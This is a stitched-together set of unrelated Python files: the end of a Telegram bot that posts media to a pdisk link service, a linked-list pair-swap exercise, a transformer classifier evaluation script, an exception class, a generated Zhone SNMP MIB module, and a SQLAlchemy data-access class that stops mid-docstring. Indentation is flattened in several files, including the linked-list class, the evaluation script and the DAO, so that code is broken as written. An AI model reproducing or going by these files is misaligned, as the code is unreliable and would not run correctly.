    s = f"http://linkapi.net/open/create_item?api_key={PDISK_API}&content_src={link}&link_type=link&title={title}"
    r = requests.get(s).json()
    z = r['data']["item_id"]
    markup = client.build_reply_markup(Button.url("⚡ PDISK LINK ⚡", f"http://m.pdisk.net/share-video?videoid={z}"))
    await client.send_message(chat, f"𝐒𝐮𝐜𝐞𝐬𝐬𝐟𝐮𝐥𝐥𝐲 𝐏𝐫𝐨𝐜𝐞𝐬𝐬𝐞𝐝 𝐘𝐨𝐮𝐫 𝐑𝐞𝐪𝐮𝐞𝐬𝐭..! \n 𝙏𝙄𝙏𝙇𝙀 : {title} \n 𝙐𝙍𝙇 : <code>http://m.pdisk.net/share-video?videoid={z}</code> \n\n 𝙎𝙏𝘼𝙏𝙐𝙎 : <code>Processing...</code> \n\n Link Will Be Active Within 5-10 Mins..! \n\n @POWERROCKERS \n @TNFILMBOXOFFICIAL", parse_mode='html', buttons=markup)
@client.on(events.NewMessage(pattern='/telepdisk'))
async def telepdisk_handler(event):
    chat = await event.get_chat()
    dw = await event.get_reply_message()
    links = event.text.split(" ")[1]
    await client.send_message(chat, "DOWNLOADING PLZ ...")
    await dw.download_media(links)
    shutil.move(f"/app/{links}", f"/app/templates/download/{links}")
    await client.send_message(chat, f"wait few minutes ...{links}")
    link = f"{d}/files/{links}"
    s = f"http://linkapi.net/open/create_item?api_key={PDISK_API}&content_src={link}&link_type=link&title={links}"
    r = requests.get(s).json()
    item_id = r['data']['item_id']
    markup = client.build_reply_markup(Button.url("⚡ PDISK LINK ⚡", f"http://m.pdisk.net/share-video?videoid={item_id}"))
    await client.send_message(chat, f"𝐒𝐮𝐜𝐞𝐬𝐬𝐟𝐮𝐥𝐥𝐲 𝐏𝐫𝐨𝐜𝐞𝐬𝐬𝐞𝐝 𝐘𝐨𝐮𝐫 𝐑𝐞𝐪𝐮𝐞𝐬𝐭..! \n 𝙏𝙄𝙏𝙇𝙀 : {links} \n 𝙐𝙍𝙇 : <code>http://m.pdisk.net/share-video?videoid={item_id}</code> \n\n 𝙎𝙏𝘼𝙏𝙐𝙎 : <code>Processing...</code> \n\n Link Will Be Active Within 5-10 Mins..! \n\n @POWERROCKERS \n @TNFILMBOXOFFICIAL", parse_mode='html', buttons=markup)
#os.remove(f"/app/templates/download/{links}")
@client.on(events.NewMessage(pattern='(?i)/upload'))
async def upload_handler(event):
    chat = await event.get_chat()
    dw = await event.get_reply_message()
    links = event.text.split(" ")[1]
    await client.send_message(chat, "DOWNLOADING PLZ ...")
    await dw.download_media(links)
    shutil.move(f"/app/{links}", f"/app/templates/download/{links}")
    await client.send_message(chat, f"{d}/files/{links}")
    if os.path.exists(f"/app/Download/{chat.username}"):
        await client.send_message(chat, "downloading")
        ss = await dw.download_media()
        await client.send_message(chat, f"{d}/u?url={ss}")
client.start(bot_token=BOT_TOKEN)
client.run_until_disconnected()
|
nilq/baby-python
|
python
|
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, val=0, next=None):
self.val = val
self.next = next
def swapPairs(head):
"""
:type head: ListNode
:rtype: ListNode
"""
    dummy = ListNode(-1)
    prev, current = dummy, head
    dummy.next = head
    while current and current.next:
        # Re-link the pair: prev -> second -> first -> rest
        prev.next = current.next
        current.next = current.next.next
        prev.next.next = current
        # Step past the swapped pair
        current = current.next
        prev = prev.next.next
    return dummy.next
def printListNode(head):
    while head:
        print(str(head.val) + " ----->", end=" ")
        head = head.next
    print()
head_node = ListNode(1)
head_node.next = ListNode(2)
head_node.next.next = ListNode(3)
head_node.next.next.next = ListNode(4)
printListNode(head_node)
head_node = swapPairs(head_node)
printListNode(head_node)
|
nilq/baby-python
|
python
|
import pandas as pd
import numpy as np
import tensorflow as tf
import torch
from torch.nn import BCEWithLogitsLoss, BCELoss
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from keras.preprocessing.sequence import pad_sequences
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.metrics import classification_report, confusion_matrix, multilabel_confusion_matrix, f1_score, accuracy_score
import pickle
import json
from tqdm import tqdm, trange
from ast import literal_eval
from transformers import AutoTokenizer, AutoModel, AutoModelForSequenceClassification
#clf
from transformers import GPT2ForSequenceClassification
from utils import *
import pdb
if __name__ == '__main__':
import argparse, sys
parser = argparse.ArgumentParser()
    # Mandatory parameters first
parser.add_argument("--task",default="multiLabelClassification",choices=["multiLabelClassification","twitter"])
parser.add_argument("--model_name", help="legalBert vs roberta",choices=["legalBert","legalRoberta","bert_uncased","bert_cased","bert_large","gpt2","roberta"])
parser.add_argument("--cpu",action='store_true')
parser.add_argument("-bs","--batch_size",type=int,default=None)
    # Parse arguments
args = parser.parse_args()
task=args.task
if task=="twitter":
with open("config_twitter.json", "r") as read_file:
config = json.load(read_file)
elif task=="multiLabelClassification":
with open("config.json", "r") as read_file:
config = json.load(read_file)
NUM_LABELS=config["task"]["NUM_LABELS"]
# Select a batch size for training. For fine-tuning with XLNet, the authors recommend a batch size of 32, 48, or 128. We will use 32 here to avoid memory issues.
batch_size=config["task"]['batch_size']
if args.batch_size:
batch_size=args.batch_size
    # Set the experiment model name
model_name=args.model_name
cpu=args.cpu
    # Max number of input tokens for one sentence
    if model_name == 'gpt2':
        max_length = config["task"]["max_length_gpt"]
    else:
        max_length = config["task"]["max_length_bert"]
#cuda
if cpu:
device = torch.device("cpu")
print("using multi cpu mode")
else:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
n_gpu = torch.cuda.device_count()
print("torch.cuda.is_available: ",torch.cuda.is_available())
print("torch.cuda.device_count:",n_gpu)
test_loader_fn='/mnt/localdata/geng/data/downstream/{task}/{model_name}/test_data_loader_bs{batch_size}'.format(model_name=model_name,batch_size=batch_size,task=task)
if cpu:
test_dataloader=torch.load(test_loader_fn,map_location=torch.device('cpu'))
else:
test_dataloader=torch.load(test_loader_fn)
# import pretrained model
if model_name=="gpt2":
model=GPT2ForSequenceClassification.from_pretrained("gpt2", num_labels=NUM_LABELS)
else:
model=AutoModelForSequenceClassification.from_pretrained(config['model'][model_name], num_labels=NUM_LABELS)
model_fn='/mnt/localdata/geng/model/downstream/{task}/{model_name}/clf_{model_name}'.format(model_name=model_name,task=task)
if cpu:
clf_model=torch.load(model_fn,map_location=torch.device('cpu'))
else:
clf_model=torch.load(model_fn)
model.load_state_dict(clf_model)
if cpu:
parallel_model=model
else:
parallel_model = torch.nn.DataParallel(model) # Encapsulate the model
parallel_model.cuda()
# Put model in evaluation mode to evaluate loss on the test set
parallel_model.eval()
# Variables to gather full output
logit_preds,true_labels,pred_labels,tokenized_texts = [],[],[],[]
# Predict
for i, batch in enumerate(test_dataloader):
batch = tuple(t.to(device) for t in batch)
# Unpack the inputs from our dataloader
b_input_ids, b_input_mask, b_labels, b_token_types = batch
with torch.no_grad():
# Forward pass
outs = parallel_model(b_input_ids, token_type_ids=b_token_types, attention_mask=b_input_mask)
b_logit_pred = outs[0]
pred_label = torch.sigmoid(b_logit_pred)
b_logit_pred = b_logit_pred.detach().cpu().numpy()
pred_label = pred_label.to('cpu').numpy()
b_labels = b_labels.to('cpu').numpy()
tokenized_texts.append(b_input_ids)
logit_preds.append(b_logit_pred)
true_labels.append(b_labels)
pred_labels.append(pred_label)
# Flatten outputs
pred_labels = [item for sublist in pred_labels for item in sublist]
true_labels = [item for sublist in true_labels for item in sublist]
# Calculate Accuracy
threshold = 0.50
pred_bools = [pl>threshold for pl in pred_labels]
true_bools = [tl==1 for tl in true_labels]
val_f1_accuracy = f1_score(true_bools,pred_bools,average='micro')*100
val_flat_accuracy = accuracy_score(true_bools, pred_bools)*100
print('F1 test Accuracy: ', val_f1_accuracy)
print('Flat test Accuracy: ', val_flat_accuracy)
with open("/mnt/localdata/geng/model/downstream/{task}/{model_name}/prediction.pickle".format(model_name=model_name,task=task), "wb") as f:
pickle.dump((pred_labels,true_labels), f)
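# Example invocation (script name is illustrative; the data/model paths above
# are environment-specific):
#   python evaluate_clf.py --task multiLabelClassification --model_name legalRoberta -bs 32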
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""Class for dependency error exception
.. module:: lib.exceptions.dependencyerror
:platform: Unix
:synopsis: Class for dependency error exception
.. moduleauthor:: Petr Czaderna <pc@hydratk.org>
"""
class DependencyError(Exception):
"""Class DependencyError
"""
def __init__(self, error_num, args, msg):
"""Class constructor
Called when object is initialized
Args:
error_num (int): number
args (list): arguments
msg (str): message
"""
self.error_num = error_num
self.args = args
self.message = msg
|
nilq/baby-python
|
python
|
#
# PySNMP MIB module Zhone (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Zhone
# Produced by pysmi-0.3.4 at Mon Apr 29 18:11:18 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "ValueRangeConstraint")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
TimeTicks, Counter64, ObjectIdentity, Bits, IpAddress, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, ModuleIdentity, Counter32, NotificationType, Unsigned32, iso, MibIdentifier, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "Counter64", "ObjectIdentity", "Bits", "IpAddress", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises", "ModuleIdentity", "Counter32", "NotificationType", "Unsigned32", "iso", "MibIdentifier", "Gauge32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
zhone = ModuleIdentity((1, 3, 6, 1, 4, 1, 5504))
zhone.setRevisions(('2011-12-05 16:58', '2011-05-06 00:20', '2010-02-19 10:51', '2009-05-27 02:08', '2008-01-23 11:46', '2007-11-09 13:05', '2007-10-16 10:26', '2007-02-17 13:43', '2006-06-09 12:48', '2005-12-01 14:20', '2004-10-13 14:40', '2004-10-08 11:15', '2004-08-11 15:42', '2004-01-30 13:34', '2003-10-28 11:03', '2003-07-17 14:29', '2002-03-04 15:34', '2001-10-09 12:07', '2000-09-28 16:32', '2000-12-18 16:32', '2000-12-20 17:20', '2001-02-07 17:11', '2001-02-22 11:35', '2001-04-10 14:35', '2001-05-15 10:32', '2001-06-26 17:06', '2001-06-28 13:33', '2001-07-31 08:51', '2001-08-29 16:56', '2001-08-31 15:33',))
if mibBuilder.loadTexts: zhone.setLastUpdated('201112052000Z')
if mibBuilder.loadTexts: zhone.setOrganization('Zhone Technologies')
zhoneRegistrations = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1))
if mibBuilder.loadTexts: zhoneRegistrations.setStatus('current')
zhoneRegPls = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 1))
if mibBuilder.loadTexts: zhoneRegPls.setStatus('current')
zhoneRegCpe = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 2))
if mibBuilder.loadTexts: zhoneRegCpe.setStatus('current')
zhoneRegMux = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 3))
if mibBuilder.loadTexts: zhoneRegMux.setStatus('current')
zhoneRegSechtor = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 4))
if mibBuilder.loadTexts: zhoneRegSechtor.setStatus('current')
zhoneRegWtn = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 5))
if mibBuilder.loadTexts: zhoneRegWtn.setStatus('current')
zhoneRegMalc = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 6))
if mibBuilder.loadTexts: zhoneRegMalc.setStatus('current')
zhoneProduct = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2))
if mibBuilder.loadTexts: zhoneProduct.setStatus('current')
zhonePls = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 1))
if mibBuilder.loadTexts: zhonePls.setStatus('current')
zhoneZedge = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 2))
if mibBuilder.loadTexts: zhoneZedge.setStatus('current')
zhoneZplex = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 3))
if mibBuilder.loadTexts: zhoneZplex.setStatus('current')
zhoneSechtor = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 4))
if mibBuilder.loadTexts: zhoneSechtor.setStatus('current')
sechtor100 = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 4, 1))
if mibBuilder.loadTexts: sechtor100.setStatus('current')
sechtor300 = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 4, 2))
if mibBuilder.loadTexts: sechtor300.setStatus('current')
zhoneWtn = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 5))
if mibBuilder.loadTexts: zhoneWtn.setStatus('current')
zhoneMalc = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 6))
if mibBuilder.loadTexts: zhoneMalc.setStatus('current')
zhoneZmsProduct = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 7))
if mibBuilder.loadTexts: zhoneZmsProduct.setStatus('current')
zhoneGeneric = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3))
if mibBuilder.loadTexts: zhoneGeneric.setStatus('current')
zhoneSystem = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 1))
if mibBuilder.loadTexts: zhoneSystem.setStatus('current')
zhoneShelf = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 2))
if mibBuilder.loadTexts: zhoneShelf.setStatus('current')
zhoneCard = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 3))
if mibBuilder.loadTexts: zhoneCard.setStatus('current')
zhoneSubscriber = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 4))
if mibBuilder.loadTexts: zhoneSubscriber.setStatus('current')
zhoneInterfaceTranslation = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 5))
if mibBuilder.loadTexts: zhoneInterfaceTranslation.setStatus('current')
zhoneInterfaceGroup = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 6))
if mibBuilder.loadTexts: zhoneInterfaceGroup.setStatus('current')
zhoneMasterAgent = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 7))
if mibBuilder.loadTexts: zhoneMasterAgent.setStatus('current')
zhoneTrapModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 8))
if mibBuilder.loadTexts: zhoneTrapModules.setStatus('current')
zhoneGenWtn = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 9))
if mibBuilder.loadTexts: zhoneGenWtn.setStatus('current')
zhoneZAP = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 10))
if mibBuilder.loadTexts: zhoneZAP.setStatus('current')
zhoneVoiceStats = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 11))
if mibBuilder.loadTexts: zhoneVoiceStats.setStatus('current')
zhoneSFF = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 12))
if mibBuilder.loadTexts: zhoneSFF.setStatus('current')
zhoneInterfaceConfig = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 13))
if mibBuilder.loadTexts: zhoneInterfaceConfig.setStatus('current')
zhoneCommunicationProtocols = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4))
if mibBuilder.loadTexts: zhoneCommunicationProtocols.setStatus('current')
zhoneIp = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 1))
if mibBuilder.loadTexts: zhoneIp.setStatus('current')
zhoneAtm = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 2))
if mibBuilder.loadTexts: zhoneAtm.setStatus('current')
zhoneVoice = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 3))
if mibBuilder.loadTexts: zhoneVoice.setStatus('current')
zhoneVoip = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 4))
if mibBuilder.loadTexts: zhoneVoip.setStatus('current')
zhonePpp = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 5))
if mibBuilder.loadTexts: zhonePpp.setStatus('current')
zhoneIma = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 6))
if mibBuilder.loadTexts: zhoneIma.setStatus('current')
zhoneBridge = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 7))
if mibBuilder.loadTexts: zhoneBridge.setStatus('current')
zhoneVideo = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 8))
if mibBuilder.loadTexts: zhoneVideo.setStatus('current')
zhoneIsdn = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 9))
if mibBuilder.loadTexts: zhoneIsdn.setStatus('current')
zhoneCes = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 10))
if mibBuilder.loadTexts: zhoneCes.setStatus('current')
zhoneSs7 = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 11))
if mibBuilder.loadTexts: zhoneSs7.setStatus('current')
zhoneClass5 = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 12))
if mibBuilder.loadTexts: zhoneClass5.setStatus('current')
zhoneBonding = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 13))
if mibBuilder.loadTexts: zhoneBonding.setStatus('current')
zhoneRadius = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 14))
if mibBuilder.loadTexts: zhoneRadius.setStatus('current')
zhoneIua = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 15))
if mibBuilder.loadTexts: zhoneIua.setStatus('current')
zhone802Dot1Mibs = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 16))
if mibBuilder.loadTexts: zhone802Dot1Mibs.setStatus('current')
zhonePtp = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 17))
if mibBuilder.loadTexts: zhonePtp.setStatus('current')
zhonePhysical = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5))
if mibBuilder.loadTexts: zhonePhysical.setStatus('current')
zhoneEnet = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 1))
if mibBuilder.loadTexts: zhoneEnet.setStatus('current')
zhoneDsx = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 2))
if mibBuilder.loadTexts: zhoneDsx.setStatus('current')
zhoneOcx = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 3))
if mibBuilder.loadTexts: zhoneOcx.setStatus('current')
zhoneDsl = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 4))
if mibBuilder.loadTexts: zhoneDsl.setStatus('current')
zhoneConsole = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 5))
if mibBuilder.loadTexts: zhoneConsole.setStatus('current')
zhoneRadio = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 8))
if mibBuilder.loadTexts: zhoneRadio.setStatus('current')
zhoneSonet = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 9))
if mibBuilder.loadTexts: zhoneSonet.setStatus('current')
zhoneDs3Ext = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 10))
if mibBuilder.loadTexts: zhoneDs3Ext.setStatus('current')
zhoneLineTypes = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 11))
if mibBuilder.loadTexts: zhoneLineTypes.setStatus('current')
zhoneApon = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 12))
if mibBuilder.loadTexts: zhoneApon.setStatus('current')
zhoneVdsl = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 13))
if mibBuilder.loadTexts: zhoneVdsl.setStatus('current')
zhoneGpon = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 14))
if mibBuilder.loadTexts: zhoneGpon.setStatus('current')
zhoneWdm = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 15))
if mibBuilder.loadTexts: zhoneWdm.setStatus('current')
zhoneCpe = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 16))
if mibBuilder.loadTexts: zhoneCpe.setStatus('current')
zhoneModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 6))
if mibBuilder.loadTexts: zhoneModules.setStatus('current')
zhoneShelfSlotTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 7), )
if mibBuilder.loadTexts: zhoneShelfSlotTable.setStatus('current')
zhoneShelfSlotEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 7, 1), ).setIndexNames((0, "Zhone", "zhoneShelfIndex"), (0, "Zhone", "zhoneSlotIndex"))
if mibBuilder.loadTexts: zhoneShelfSlotEntry.setStatus('current')
zhoneShelfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 7, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneShelfIndex.setStatus('current')
zhoneSlotIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 7, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneSlotIndex.setStatus('current')
zhoneCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 9))
zhoneGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 9, 1))
zhoneShelfSlotGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 5504, 9, 1, 1)).setObjects(("Zhone", "zhoneShelfIndex"), ("Zhone", "zhoneSlotIndex"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
zhoneShelfSlotGroup = zhoneShelfSlotGroup.setStatus('current')
zhoneCompliance = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 9, 2))
zhoneShelfSlotCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 5504, 9, 2, 1)).setObjects(("Zhone", "zhoneShelfSlotGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
zhoneShelfSlotCompliance = zhoneShelfSlotCompliance.setStatus('current')
zhoneExperimental = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10))
if mibBuilder.loadTexts: zhoneExperimental.setStatus('current')
ietfDrafts = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1))
if mibBuilder.loadTexts: ietfDrafts.setStatus('current')
apsMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 1))
if mibBuilder.loadTexts: apsMIB.setStatus('current')
sipTC = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 2))
if mibBuilder.loadTexts: sipTC.setStatus('current')
sipCommonMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 3))
if mibBuilder.loadTexts: sipCommonMIB.setStatus('current')
sipUAMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 4))
if mibBuilder.loadTexts: sipUAMIB.setStatus('current')
pktcIetfSigMib = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 5))
if mibBuilder.loadTexts: pktcIetfSigMib.setStatus('current')
efmOamMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 6))
if mibBuilder.loadTexts: efmOamMIB.setStatus('current')
efmCuMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 7))
if mibBuilder.loadTexts: efmCuMIB.setStatus('current')
pwTcStdMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 8))
if mibBuilder.loadTexts: pwTcStdMIB.setStatus('current')
ianaPwe3MIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 9))
if mibBuilder.loadTexts: ianaPwe3MIB.setStatus('current')
pwStdMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 10))
if mibBuilder.loadTexts: pwStdMIB.setStatus('current')
pwTDMMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 11))
if mibBuilder.loadTexts: pwTDMMIB.setStatus('current')
zhoneRmonMibModule = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 12))
if mibBuilder.loadTexts: zhoneRmonMibModule.setStatus('current')
zhoneDrafts = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 2))
if mibBuilder.loadTexts: zhoneDrafts.setStatus('current')
mibBuilder.exportSymbols("Zhone", zhoneCpe=zhoneCpe, zhone=zhone, zhoneZAP=zhoneZAP, zhoneIma=zhoneIma, zhoneShelfIndex=zhoneShelfIndex, zhoneWtn=zhoneWtn, zhoneRegWtn=zhoneRegWtn, zhonePhysical=zhonePhysical, zhoneConsole=zhoneConsole, zhoneRegistrations=zhoneRegistrations, zhoneRmonMibModule=zhoneRmonMibModule, zhoneSonet=zhoneSonet, zhoneIua=zhoneIua, zhoneCompliance=zhoneCompliance, zhoneSs7=zhoneSs7, zhoneDsl=zhoneDsl, zhoneRegPls=zhoneRegPls, ietfDrafts=ietfDrafts, zhonePpp=zhonePpp, zhone802Dot1Mibs=zhone802Dot1Mibs, zhoneGroups=zhoneGroups, zhoneProduct=zhoneProduct, sechtor300=sechtor300, zhonePtp=zhonePtp, zhoneAtm=zhoneAtm, zhoneEnet=zhoneEnet, sechtor100=sechtor100, zhoneDrafts=zhoneDrafts, zhoneShelf=zhoneShelf, zhonePls=zhonePls, zhoneModules=zhoneModules, zhoneShelfSlotEntry=zhoneShelfSlotEntry, zhoneSechtor=zhoneSechtor, zhoneApon=zhoneApon, zhoneZmsProduct=zhoneZmsProduct, apsMIB=apsMIB, zhoneSFF=zhoneSFF, sipTC=sipTC, zhoneRegCpe=zhoneRegCpe, zhoneClass5=zhoneClass5, zhoneCes=zhoneCes, zhoneCard=zhoneCard, zhoneVideo=zhoneVideo, zhoneRegMalc=zhoneRegMalc, zhoneCompliances=zhoneCompliances, zhoneVdsl=zhoneVdsl, zhoneSystem=zhoneSystem, zhoneInterfaceGroup=zhoneInterfaceGroup, zhoneShelfSlotTable=zhoneShelfSlotTable, pwTcStdMIB=pwTcStdMIB, zhoneInterfaceTranslation=zhoneInterfaceTranslation, pktcIetfSigMib=pktcIetfSigMib, zhoneVoip=zhoneVoip, zhoneMalc=zhoneMalc, zhoneShelfSlotCompliance=zhoneShelfSlotCompliance, zhoneShelfSlotGroup=zhoneShelfSlotGroup, zhoneBridge=zhoneBridge, sipUAMIB=sipUAMIB, zhoneGeneric=zhoneGeneric, zhoneVoiceStats=zhoneVoiceStats, zhoneExperimental=zhoneExperimental, zhoneDs3Ext=zhoneDs3Ext, zhoneSlotIndex=zhoneSlotIndex, zhoneVoice=zhoneVoice, zhoneIsdn=zhoneIsdn, zhoneMasterAgent=zhoneMasterAgent, zhoneLineTypes=zhoneLineTypes, PYSNMP_MODULE_ID=zhone, efmOamMIB=efmOamMIB, zhoneRegMux=zhoneRegMux, zhoneBonding=zhoneBonding, pwStdMIB=pwStdMIB, zhoneOcx=zhoneOcx, zhoneZplex=zhoneZplex, zhoneCommunicationProtocols=zhoneCommunicationProtocols, zhoneTrapModules=zhoneTrapModules, zhoneRadius=zhoneRadius, ianaPwe3MIB=ianaPwe3MIB, zhoneWdm=zhoneWdm, efmCuMIB=efmCuMIB, zhoneInterfaceConfig=zhoneInterfaceConfig, sipCommonMIB=sipCommonMIB, zhoneZedge=zhoneZedge, zhoneGpon=zhoneGpon, zhoneIp=zhoneIp, zhoneSubscriber=zhoneSubscriber, zhoneGenWtn=zhoneGenWtn, zhoneDsx=zhoneDsx, zhoneRadio=zhoneRadio, pwTDMMIB=pwTDMMIB, zhoneRegSechtor=zhoneRegSechtor)
|
nilq/baby-python
|
python
|
from sqlalchemy import create_engine, Table, MetaData
from sqlalchemy.sql import select, delete, update, and_
import collections
from config import *
import datetime
class Dao():
con = None
def get_db_engine(self):
engine = create_engine(
'postgresql+psycopg2://%s:%s@%s:%s/%s' % (
DB_USER,
DB_PASS,
DB_HOST,
DB_PORT,
DB_NAME))
return engine
def get_con(self):
if self.con is None:
engine = self.get_db_engine()
self.con = engine.connect()
return self.con
def get_table(self, tablename, schema=None):
engine = self.get_db_engine()
tbl = Table(
tablename, MetaData(engine), autoload=True, schema=schema)
return tbl
def fetch_all_dict(self, stm):
engine = self.get_db_engine()
with engine.connect() as con:
queryset = con.execute(stm)
rows = list()
for row in queryset:
d = dict(collections.OrderedDict(row))
rows.append(d)
return rows
def fetch_one_dict(self, stm):
engine = self.get_db_engine()
with engine.connect() as con:
queryset = con.execute(stm).fetchone()
if queryset is not None:
d = dict(collections.OrderedDict(queryset))
return d
else:
return None
def get_job_by_id(self, id):
tbl = self.get_table(tablename='des_astrometryjob')
stm = select(tbl.c).where(and_(tbl.c.id == int(id)))
return self.fetch_one_dict(stm)
def import_with_copy_expert(self, sql, data):
"""
This method is recommended for importing large volumes of data. using the postgresql COPY method.
The method is useful to handle all the parameters that PostgreSQL makes available
